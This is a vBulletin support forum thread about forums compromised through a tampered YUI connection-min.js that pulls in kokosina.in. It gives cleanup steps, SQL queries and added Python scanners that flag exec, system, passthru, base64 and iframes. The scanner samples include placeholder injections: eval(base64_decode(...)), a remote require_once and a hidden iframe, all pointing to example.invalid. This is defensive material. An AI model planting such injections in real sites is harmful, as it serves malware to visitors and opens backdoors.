Virus or Malware URL?

  • HeLLRZR
    Member
    • Feb 2011
    • 98

    [CMS] Virus or Malware URL?

    Several users are reporting that their anti-virus is reporting the following virus or malware when accessing our website, any ideas?

    URL: http://kokosina.in/t/go.php?sid
    process: file://C:\Program Files (x86)\Internet E...
    infection: al

    When I access the website, my anti-virus doesn't report a problem, confused...

    Thanks,
  • stevieg
    New Member
    • Mar 2004
    • 5

    #2
    You have been hacked. My limited knowledge has found a couple of .js scripts in the clientscripts directory which allow a hacker remote access to my webserver. I renamed my home directory, downloaded the latest version and unzipped it to a new clean home directory, ran the upgrade script and restored my smilies and .gifs, and all seems to be clean now.

    Not sure what vulnerability they're using that allows them to drop the .js scripts, but the ones I found were a connection.js and a yui.1.30.js or something to that effect.

    Starting to get really annoyed at getting hacked all the time; I've updated to the latest vBulletin version 3 times in the last three months (always the most current) just to remove active hacks from my forum home directory.

    Steve


    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 74122

      #3
      We don't know how to fix the issue or what the attack vector is at this time. I keep asking people to open a support ticket so we can investigate. Until someone does, we can't tell you how your forum was infected. Until then try these methods here to clear it:

      1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

      2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

      3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

      4) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

      5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

      Query for steps 4 and 5:
      -- the PHP function is passthru(); in LIKE, '_' is a one-character wildcard, so '%pass_thru%' alone would not match it
      SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%pass_thru%' OR phpcode LIKE '%iframe%';

      6) Run this query:
      SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%pass_thru%' OR template LIKE '%iframe%';

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

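The plugin and template checks in steps 2 to 6 above, as an added example in Python (not vBulletin code and not part of the original post). It is meant to be run over the rows the two SELECT queries return (plugin title/phpcode and template title/template); the SAMPLE_ROWS below are constructed stand-ins with hypothetical titles and an example.invalid URL so the script runs offline. Unlike the bare LIKE patterns, it matches actual calls, decodes base64_decode('...') literals so you can see what they would run, and skips the iframes in the templates the post lists as legitimate.

```python
"""Indicator scan for rogue plugins and templates (added example, not vBulletin code).

Feed scan_rows() dicts built from the post's SELECT queries:
  {"kind": "plugin",   "title": <plugin.title>,   "code": <plugin.phpcode>}
  {"kind": "template", "title": <template.title>, "code": <template.template>}
"""
import base64
import binascii
import re

# Word-boundary patterns that require the call parenthesis, instead of the
# bare LIKE '%system%' / '%exec%', which also match "ecosystem" or "executive".
# passthru() is the real PHP name.
INDICATORS = {
    "shell_function": re.compile(
        r"\b(?:exec|system|passthru|shell_exec|popen|proc_open)\s*\(", re.I),
    "eval_or_obfuscation": re.compile(
        r"\b(?:eval|create_function|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]?(?:https?|ftp)://", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
}

# Templates in which the post says an <iframe> is expected.
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")


def decode_base64_literals(code):
    """Decoded form of every base64_decode('...') literal in code, so the
    reviewer can see what an obfuscated plugin would actually run."""
    out = []
    for literal in B64_LITERAL.findall(code):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", literal), validate=True)
            out.append(raw.decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            out.append("<undecodable>")
    return out


def scan_rows(rows, iframe_allowlist=IFRAME_ALLOWED):
    """One finding per (row, indicator) that fires; iframes in allowlisted
    templates are ignored."""
    findings = []
    for row in rows:
        for name, rx in INDICATORS.items():
            m = rx.search(row["code"])
            if not m:
                continue
            if (name == "iframe" and row["kind"] == "template"
                    and row["title"] in iframe_allowlist):
                continue
            findings.append({
                "kind": row["kind"], "title": row["title"], "indicator": name,
                "match": m.group(0),
                "decoded": decode_base64_literals(row["code"])
                if name == "eval_or_obfuscation" else [],
            })
    return findings


# Constructed sample rows (hypothetical titles and code, not from any real site).
SAMPLE_ROWS = [
    {"kind": "plugin", "title": "Forum stats widget",  # clean: "executive"/"ecosystem" are not calls
     "code": "// executive summary of the forum ecosystem\n"
             "$stats = $vbulletin->db->query_first('SELECT COUNT(*) AS n FROM ' . TABLE_PREFIX . 'user');"},
    {"kind": "plugin", "title": "Analytics hook",      # obfuscated payload; ZWNobyAx is base64 for "echo 1"
     "code": "eval(base64_decode('ZWNobyAx'));"},
    {"kind": "plugin", "title": "Remote helper",       # code fetched from a foreign server at runtime
     "code": "require_once('http://example.invalid/helper.txt');"},
    {"kind": "template", "title": "FORUMHOME",         # hidden frame injected into a template that should have none
     "code": "<div id=\"content\">$navbar</div>\n"
             "<iframe src=\"http://example.invalid/t/go.php\" width=\"1\" height=\"1\"></iframe>"},
    {"kind": "template", "title": "bbcode_video",      # legitimate iframe per the post's list
     "code": "<iframe src=\"$url\" width=\"$width\" height=\"$height\"></iframe>"},
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f['kind']:8} {f['title']:18} {f['indicator']:20} {f['match']!r} {f['decoded']}")
```

Anything the scan flags still needs a human look: a base64 literal in a branded add-on may decode to a licence string rather than a shell, which is exactly the judgement call the post describes.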

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 74122

        #4
        Originally posted by stevieg
        You have been hacked. My limited knowledge has found a couple of .js scripts in the clientscripts directory which allow a hacker remote access to my webserver. I renamed my home directory, downloaded the latest version and unzipped it to a new clean home directory, ran the upgrade script and restored my smilies and .gifs, and all seems to be clean now.

        Not sure what vulnerability they're using that allows them to drop the .js scripts, but the ones I found were a connection.js and a yui.1.30.js or something to that effect.

        Starting to get really annoyed at getting hacked all the time; I've updated to the latest vBulletin version 3 times in the last three months (always the most current) just to remove active hacks from my forum home directory.

        Steve
        Depends on which of your sites is being exploited. One is woefully out of date. For the other, load the YUI files off either Google's or Yahoo's servers. Settings -> Options -> Server Settings & Optimization Options -> Use Remote YUI. Though if you're on the latest version, there is probably another vector and they just use those files for their compromises.

        • stevieg
          New Member
          • Mar 2004
          • 5

          #5
          It was the dorikaze.net domain that got hit, the end result was an infection with privacy.exe malware.

          I'm not sure how they're getting in yet or even how to make sure it's gone (temporarily or permanently) because I only get the message on one of 6 computers; all the others are not showing the symptom. I did notice that Java was starting in the tray icon, so they're definitely using Java to push the malware attack.

          Not sure how they're dropping the initial .js code into the clientscripts directory in the first place, though.


          • Devil_Dog
            New Member
            • Aug 2010
            • 6

            #6
            I've been hit as well. Will be sending a ticket.


            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 74122

              #7
              Seems to be some sort of exploit that is writing to the connection-min.js file within the clientscript/yui/connection folder. vBulletin doesn't have any native functions that write to this directory.

              You should replace this file and contact your hosting provider to see if you can CHMOD your files to 0644. If you can, you should update the permissions on all your .js, php, html and xml files to this permission setting. You can also set the system to load the YUI files from a Remote Server under Settings -> Options -> Server Settings and Optimization Options.

              You will also need to verify that you don't have any strange plugins that allow system access. This is covered in my list above under steps 4 and 5.

              Also see: https://www.vbulletin.com/forum/show...ms-More-Secure
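The two actions in the post above (replace the tampered clientscript file after comparing against a clean copy, and set .js/.php/.html/.xml files to 0644), together with the file comparison that step 1 of the earlier checklist relies on, as an added Python example. This is not vBulletin's Suspect File Diagnostics and not code from the thread; the manifest must be built from a clean download of the same vBulletin release you run, and demo() constructs both a clean tree and a tampered live tree in a temporary directory with placeholder file contents so it runs offline.

```python
"""Integrity and permission check for a vBulletin file tree
(added example, not vBulletin code)."""
import hashlib
import os
import stat
import tempfile

WEB_EXTS = {".js", ".php", ".html", ".xml"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _walk(root):
    """Yield (relative posix path, absolute path) for every file under root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            abs_path = os.path.join(dirpath, name)
            yield os.path.relpath(abs_path, root).replace(os.sep, "/"), abs_path


def build_manifest(clean_root):
    """Map relative path -> SHA-256 over a known-good tree (a clean download)."""
    return {rel: sha256_file(p) for rel, p in _walk(clean_root)}


def verify_tree(live_root, manifest):
    """Compare the deployed tree with the manifest.
    Returns (modified, unknown, missing). Modified files get replaced from the
    clean copy; unknown files are deleted unless you can tie them to an add-on."""
    modified, unknown, seen = [], [], set()
    for rel, p in _walk(live_root):
        seen.add(rel)
        if rel not in manifest:
            unknown.append(rel)
        elif manifest[rel] != sha256_file(p):
            modified.append(rel)
    missing = sorted(set(manifest) - seen)
    return sorted(modified), sorted(unknown), missing


def tighten_permissions(live_root, exts=WEB_EXTS):
    """chmod 0644 every .js/.php/.html/.xml file and return the ones that
    were group- or world-writable beforehand (worth knowing: those are the
    files a web-server-owned process could have rewritten)."""
    was_writable = []
    for rel, p in _walk(live_root):
        if os.path.splitext(rel)[1].lower() not in exts:
            continue
        if stat.S_IMODE(os.stat(p).st_mode) & 0o022:
            was_writable.append(rel)
        os.chmod(p, 0o644)
    return sorted(was_writable)


def _write(root, rel, text, mode=0o644):
    p = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(p), exist_ok=True)
    with open(p, "w", encoding="utf-8") as fh:
        fh.write(text)
    os.chmod(p, mode)  # pin the mode so the demo does not depend on the umask


def demo():
    """Constructed scenario: clean release tree, live copy with
    connection-min.js tampered, an unknown .js dropped and one file left 0666."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = os.path.join(tmp, "clean"), os.path.join(tmp, "live")
        release = {  # placeholder contents, not real vBulletin files
            "clientscript/yui/connection/connection-min.js": "/* YUI connection */",
            "clientscript/vbulletin_global.js": "var vB = {};",
            "includes/config.php": "<?php // config",
        }
        for root in (clean, live):
            for rel, text in release.items():
                _write(root, rel, text)
        manifest = build_manifest(clean)

        # simulate the compromise described in the thread (example.invalid URL)
        _write(live, "clientscript/yui/connection/connection-min.js",
               release["clientscript/yui/connection/connection-min.js"]
               + "\ndocument.write('<iframe src=\"http://example.invalid/t/go.php\"></iframe>');")
        _write(live, "clientscript/yui/connection/upd.js", "// dropped by attacker")
        os.chmod(os.path.join(live, "clientscript", "vbulletin_global.js"), 0o666)

        modified, unknown, missing = verify_tree(live, manifest)
        fixed = tighten_permissions(live)
        return {"modified": modified, "unknown": unknown,
                "missing": missing, "fixed": fixed}


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key:9}: {paths}")
```

Run the manifest step against the unpacked download, not against the live site, and keep the manifest off the web server; a hash list the attacker can edit proves nothing. Note that 0644 only stops writes by other users: if the web server runs as the file owner, it can still rewrite the files, which is why the post also suggests loading YUI from a remote host.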

              • IceFanatic
                Member
                • Jun 2004
                • 70

                #8
                Originally posted by HeLLRZR
                Several users are reporting that their anti-virus is reporting the following virus or malware when accessing our website, any ideas?
                I am getting this exact attack right now.

                Originally posted by Wayne Luke
                Seems to be some sort of exploit that is writing to the connection-min.js file within the clientscript/yui/connection folder. vBulletin doesn't have any native functions that write to this directory.

                You should replace this file and contact your hosting provider to see if you can CHMOD your files to 0644. If you can, you should update the permissions on all your .js, php, html and xml files to this permission setting. You can also set the system to load the YUI files from a Remote Server under Settings -> Options -> Server Settings and Optimization Options.

                You will also need to verify that you don't have any strange plugins that allow system access. This is covered in my list above under steps 4 and 5.

                Also see: https://www.vbulletin.com/forum/show...ms-More-Secure
                Okay, I replaced that file and as far as I can tell, all my files are already at 644 CHMOD. I am no longer getting that attack from the forums themselves...but when I log into the admincp I still get it.


                • Devil_Dog
                  New Member
                  • Aug 2010
                  • 6

                  #9
                  Originally posted by IceFanatic
                  Okay, I replaced that file and as far as I can tell, all my files are already at 644 CHMOD. I am no longer getting that attack from the forums themselves...but when I log into the admincp I still get it.
                  Same problem. In the forums I'm fine but in admincp I'm still getting it.


                  • palmpedia
                    Member
                    • Feb 2008
                    • 34
                    • 3.6.x

                    #10
                    Same here - I used the suggested Remote YUI setting and it appears as if the warnings have ceased for users, but I see the connection to kokosina.in is still being attempted when I access the AdminCP --- Not a very comforting feeling.


                    • stevieg
                      New Member
                      • Mar 2004
                      • 5

                      #11
                      Re-upload all the vbulletin files to your forum directory


                      • abqtj
                        Member
                        • Nov 2008
                        • 66

                        #12
                        I've been hit as well.

                        Someone accessed the control panel using the Administrator user name 6 times in Oct and 1 time in Nov, each time updating, uploading, etc different plug ins (that aren't there anymore...not sure where/why).

                         Oh, and the Administrator password has been changed.
                        New Mexico Offroad


                        • oddmud
                          Senior Member
                          • Oct 2009
                          • 982

                          #13
                          How do you know if you've been hit? And what hosts are you guys using?

                          • Wayne Luke
                            vBulletin Technical Support Lead
                            • Aug 2000
                            • 74122

                            #14
                            Originally posted by abqtj
                            I've been hit as well.

                            Someone accessed the control panel using the Administrator user name 6 times in Oct and 1 time in Nov, each time updating, uploading, etc different plug ins (that aren't there anymore...not sure where/why).

                            Oh, and the Administrator password has been changed
                            Then you most likely have a backdoor installed somewhere. If the steps above don't point out the issue and let you solve it then you need to open your own thread or open a support ticket.

                            • abqtj
                              Member
                              • Nov 2008
                              • 66

                              #15
                              I opened a support ticket, mentioned the admin password part, and it wasn't addressed.